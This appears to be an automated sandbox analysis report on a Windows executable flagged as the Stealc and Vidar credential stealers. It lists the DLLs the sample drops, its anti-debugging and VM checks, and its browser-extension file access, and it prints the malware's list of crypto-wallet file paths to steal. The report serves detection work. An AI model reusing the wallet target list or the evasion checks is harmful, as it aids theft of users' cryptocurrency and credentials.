Source: 4c469e2cf403fea6249e835ddce23de2.exe, 00000000.00000002.1953000945.000000001C7DD000.00000004.00000020.00020000.00000000.sdmp, 4c469e2cf403fea6249e835ddce23de2.exe, 00000000.00000002.1961873023.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %sD
Source: 4c469e2cf403fea6249e835ddce23de2.exe, 00000000.00000002.1953000945.000000001C7DD000.00000004.00000020.00020000.00000000.sdmp, 4c469e2cf403fea6249e835ddce23de2.exe, 00000000.00000002.1961873023.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;
Source: 4c469e2cf403fea6249e835ddce23de2.exe ReversingLabs: Detection: 13%
Source: 4c469e2cf403fea6249e835ddce23de2.exe String found in binary or memory: </LAUNCH_ICON>
Source: 4c469e2cf403fea6249e835ddce23de2.exe String found in binary or memory: </LAUNCH_BTN>
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe Section loaded: msimg32.dll Jump to behavior
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe Section loaded: oleacc.dll Jump to behavior
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe Section loaded: rstrtmgr.dll Jump to behavior
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe Section loaded: mozglue.dll Jump to behavior
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe Section loaded: wsock32.dll Jump to behavior
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe Section loaded: vcruntime140.dll Jump to behavior
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe Section loaded: msvcp140.dll Jump to behavior
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe Section loaded: vcruntime140.dll Jump to behavior
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe Section loaded: windowscodecs.dll Jump to behavior
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32 Jump to behavior
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 Jump to behavior
Source: 4c469e2cf403fea6249e835ddce23de2.exe Static PE information: Virtual size of .text is bigger than: 0x100000
Source: 4c469e2cf403fea6249e835ddce23de2.exe Static file information: File size 14201936 > 1048576
Source: 4c469e2cf403fea6249e835ddce23de2.exe Static PE information: section name: RT_CURSOR
Source: 4c469e2cf403fea6249e835ddce23de2.exe Static PE information: section name: RT_BITMAP
Source: 4c469e2cf403fea6249e835ddce23de2.exe Static PE information: section name: RT_ICON
Source: 4c469e2cf403fea6249e835ddce23de2.exe Static PE information: section name: RT_MENU
Source: 4c469e2cf403fea6249e835ddce23de2.exe Static PE information: section name: RT_DIALOG
Source: 4c469e2cf403fea6249e835ddce23de2.exe Static PE information: section name: RT_STRING
Source: 4c469e2cf403fea6249e835ddce23de2.exe Static PE information: section name: RT_ACCELERATOR
Source: 4c469e2cf403fea6249e835ddce23de2.exe Static PE information: section name: RT_GROUP_ICON
Source: 4c469e2cf403fea6249e835ddce23de2.exe Static PE information: Raw size of .text is bigger than: 0x100000 < 0x19ce00
Source: 4c469e2cf403fea6249e835ddce23de2.exe Static PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x8f5000
Source: 4c469e2cf403fea6249e835ddce23de2.exe Static PE information: Raw size of .reloc is bigger than: 0x100000 < 0x29ae00
Source: 4c469e2cf403fea6249e835ddce23de2.exe Static PE information: More than 200 imports for USER32.dll
Source: 4c469e2cf403fea6249e835ddce23de2.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: 4c469e2cf403fea6249e835ddce23de2.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: mozglue.pdbP source: 4c469e2cf403fea6249e835ddce23de2.exe, 00000000.00000002.1962494191.000000006F8DD000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source: Binary string: z:\build-dev\usbnet5.Mon_05_17_2021_16_10_12.10\projects\usbnet5\src\virt\shell\Release\usbclient.pdb0@_\9] source: 4c469e2cf403fea6249e835ddce23de2.exe
Source: Binary string: freebl3.pdb source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source: Binary string: freebl3.pdbp source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source: Binary string: nss3.pdb@ source: 4c469e2cf403fea6249e835ddce23de2.exe, 00000000.00000002.1962304971.000000006C8CF000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source: Binary string: z:\build-dev\usbnet5.Mon_05_17_2021_16_10_12.10\projects\usbnet5\src\virt\shell\Release\usbclient.pdb source: 4c469e2cf403fea6249e835ddce23de2.exe
Source: Binary string: softokn3.pdb@ source: softokn3[1].dll.0.dr, softokn3.dll.0.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.0.dr, vcruntime140[1].dll.0.dr
Source: Binary string: z:\build-dev\usbnet5.Mon_05_17_2021_16_10_12.10\projects\usbnet5\src\virt\shell\Release\usbclient.pdb0@ source: 4c469e2cf403fea6249e835ddce23de2.exe, 00000000.00000002.1937425066.0000000000B4E000.00000002.00000001.01000000.00000003.sdmp, 4c469e2cf403fea6249e835ddce23de2.exe, 00000000.00000000.1696785302.0000000000B4E000.00000002.00000001.01000000.00000003.sdmp
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140[1].dll.0.dr, msvcp140.dll.0.dr
Source: Binary string: nss3.pdb source: 4c469e2cf403fea6249e835ddce23de2.exe, 00000000.00000002.1962304971.000000006C8CF000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source: Binary string: mozglue.pdb source: 4c469e2cf403fea6249e835ddce23de2.exe, 00000000.00000002.1962494191.000000006F8DD000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source: Binary string: softokn3.pdb source: softokn3[1].dll.0.dr, softokn3.dll.0.dr
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe Code function: 0_2_009CF090 std::exception::exception,__CxxThrowException@8,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetLastError,SetLastError, 0_2_009CF090
PE file contains sections with non-standard names
Source: freebl3[1].dll.0.dr Static PE information: section name: .00cfg
Source: mozglue.dll.0.dr Static PE information: section name: .00cfg
Source: mozglue[1].dll.0.dr Static PE information: section name: .00cfg
Source: msvcp140.dll.0.dr Static PE information: section name: .didat
Source: msvcp140[1].dll.0.dr Static PE information: section name: .didat
Source: nss3.dll.0.dr Static PE information: section name: .00cfg
Source: nss3[1].dll.0.dr Static PE information: section name: .00cfg
Source: softokn3.dll.0.dr Static PE information: section name: .00cfg
Source: softokn3[1].dll.0.dr Static PE information: section name: .00cfg
Source: freebl3.dll.0.dr Static PE information: section name: .00cfg
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe Code function: 0_2_00B1B9AF push ecx; ret 0_2_00B1B9C2
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe Code function: 0_2_00B1BBB5 push ecx; ret 0_2_00B1BBC8
Drops PE files
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\freebl3[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe File created: C:\ProgramData\mozglue.dll Jump to dropped file
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe File created: C:\ProgramData\nss3.dll Jump to dropped file
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\vcruntime140[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe File created: C:\ProgramData\msvcp140.dll Jump to dropped file
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe File created: C:\ProgramData\freebl3.dll Jump to dropped file
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\msvcp140[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\softokn3[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\mozglue[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe File created: C:\ProgramData\vcruntime140.dll Jump to dropped file
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\nss3[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe File created: C:\ProgramData\softokn3.dll Jump to dropped file
Drops PE files to the application program directory (C:\ProgramData)
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe File created: C:\ProgramData\mozglue.dll Jump to dropped file
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe File created: C:\ProgramData\nss3.dll Jump to dropped file
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe File created: C:\ProgramData\msvcp140.dll Jump to dropped file
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe File created: C:\ProgramData\freebl3.dll Jump to dropped file
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe File created: C:\ProgramData\vcruntime140.dll Jump to dropped file
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe File created: C:\ProgramData\softokn3.dll Jump to dropped file
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe Code function: 0_2_009B7C20 GetClientRect,PtInRect,MapWindowPoints,SendMessageW,SetRectEmpty,RedrawWindow,ReleaseCapture,SetCapture,ReleaseCapture,SetCapture,SendMessageW,UpdateWindow,SendMessageW,IsWindow,IsIconic,IsZoomed,IsWindow,UpdateWindow, 0_2_009B7C20
Extensive use of GetProcAddress (often used to hide API calls)
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe Code function: 0_2_009CF090 std::exception::exception,__CxxThrowException@8,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetLastError,SetLastError, 0_2_009CF090
Found dropped PE file which has not been started or loaded
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\freebl3[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe Dropped PE file which has not been started: C:\ProgramData\nss3.dll Jump to dropped file
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\vcruntime140[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe Dropped PE file which has not been started: C:\ProgramData\freebl3.dll Jump to dropped file
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\msvcp140[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\softokn3[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\mozglue[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\nss3[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe Dropped PE file which has not been started: C:\ProgramData\softokn3.dll Jump to dropped file
Found large amount of non-executed APIs
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe API coverage: 0.2 %
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe Code function: 0_2_6C7AEBF0 PR_GetNumberOfProcessors,GetSystemInfo, 0_2_6C7AEBF0
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\ Jump to behavior
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\ Jump to behavior
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\ Jump to behavior
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\ Jump to behavior
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\ Jump to behavior
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\ Jump to behavior
Source: 4c469e2cf403fea6249e835ddce23de2.exe, 00000000.00000002.1939639884.0000000001D38000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMware!
Source: 4c469e2cf403fea6249e835ddce23de2.exe, 00000000.00000002.1939639884.0000000001D38000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMware
Source: 4c469e2cf403fea6249e835ddce23de2.exe, 00000000.00000002.1939639884.0000000001D51000.00000004.00000020.00020000.00000000.sdmp, 4c469e2cf403fea6249e835ddce23de2.exe, 00000000.00000002.1939639884.0000000001D96000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe Process information queried: ProcessInformation Jump to behavior
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe Code function: 0_2_00B17527 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_00B17527
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe Code function: 0_2_009CF090 std::exception::exception,__CxxThrowException@8,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetLastError,SetLastError, 0_2_009CF090
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe Code function: 0_2_00B17527 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_00B17527
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe Code function: 0_2_00B20657 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_00B20657
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe Code function: 0_2_6C87AC62 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_6C87AC62
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe Memory protected: page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion
barindex
Yara detected Powershell download and execute
Source: Yara match File source: Process Memory Space: 4c469e2cf403fea6249e835ddce23de2.exe PID: 6900, type: MEMORYSTR
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe Code function: 0_2_009B1140 _malloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,_free, 0_2_009B1140
Contains functionality to query CPU information (cpuid)
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe Code function: 0_2_6C87AE71 cpuid 0_2_6C87AE71
Queries information about the installed CPU (vendor, model number etc)
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Jump to behavior
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Jump to behavior
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe Code function: 0_2_00B2010B GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter, 0_2_00B2010B
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe Code function: 0_2_00A2F4D1 _memset,GetVersionExW, 0_2_00A2F4D1

Stealing of Sensitive Information
barindex
Yara detected Stealc
Source: Yara match File source: 00000000.00000002.1940177043.0000000003D18000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1939639884.0000000001D51000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 4c469e2cf403fea6249e835ddce23de2.exe PID: 6900, type: MEMORYSTR
Source: Yara match File source: dump.pcap, type: PCAP
Yara detected Vidar stealer
Source: Yara match File source: Process Memory Space: 4c469e2cf403fea6249e835ddce23de2.exe PID: 6900, type: MEMORYSTR
Found many strings related to Crypto-Wallets (likely being stolen)
Source: 4c469e2cf403fea6249e835ddce23de2.exe, 00000000.00000002.1940177043.0000000003D73000.00000040.00000020.00020000.00000000.sdmp String found in binary or memory: Electrum
Source: 4c469e2cf403fea6249e835ddce23de2.exe, 00000000.00000002.1940177043.0000000003D18000.00000040.00000020.00020000.00000000.sdmp String found in binary or memory: ckstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: 4c469e2cf403fea6249e835ddce23de2.exe, 00000000.00000002.1940177043.0000000003D73000.00000040.00000020.00020000.00000000.sdmp String found in binary or memory: \Electrum\wallets\
Source: 4c469e2cf403fea6249e835ddce23de2.exe, 00000000.00000002.1940177043.0000000003DAB000.00000040.00000020.00020000.00000000.sdmp String found in binary or memory: Jaxx Desktop
Source: 4c469e2cf403fea6249e835ddce23de2.exe, 00000000.00000002.1940177043.0000000003D73000.00000040.00000020.00020000.00000000.sdmp String found in binary or memory: window-state.json
Source: 4c469e2cf403fea6249e835ddce23de2.exe, 00000000.00000002.1940177043.0000000003D73000.00000040.00000020.00020000.00000000.sdmp String found in binary or memory: exodus.conf.json
Source: 4c469e2cf403fea6249e835ddce23de2.exe, 00000000.00000002.1939639884.0000000001D7B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\passphrase.json
Source: 4c469e2cf403fea6249e835ddce23de2.exe, 00000000.00000002.1940177043.0000000003D73000.00000040.00000020.00020000.00000000.sdmp String found in binary or memory: info.seco
Source: 4c469e2cf403fea6249e835ddce23de2.exe, 00000000.00000002.1940177043.0000000003D73000.00000040.00000020.00020000.00000000.sdmp String found in binary or memory: ElectrumLTC
Source: 4c469e2cf403fea6249e835ddce23de2.exe, 00000000.00000002.1939639884.0000000001D7B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\passphrase.json
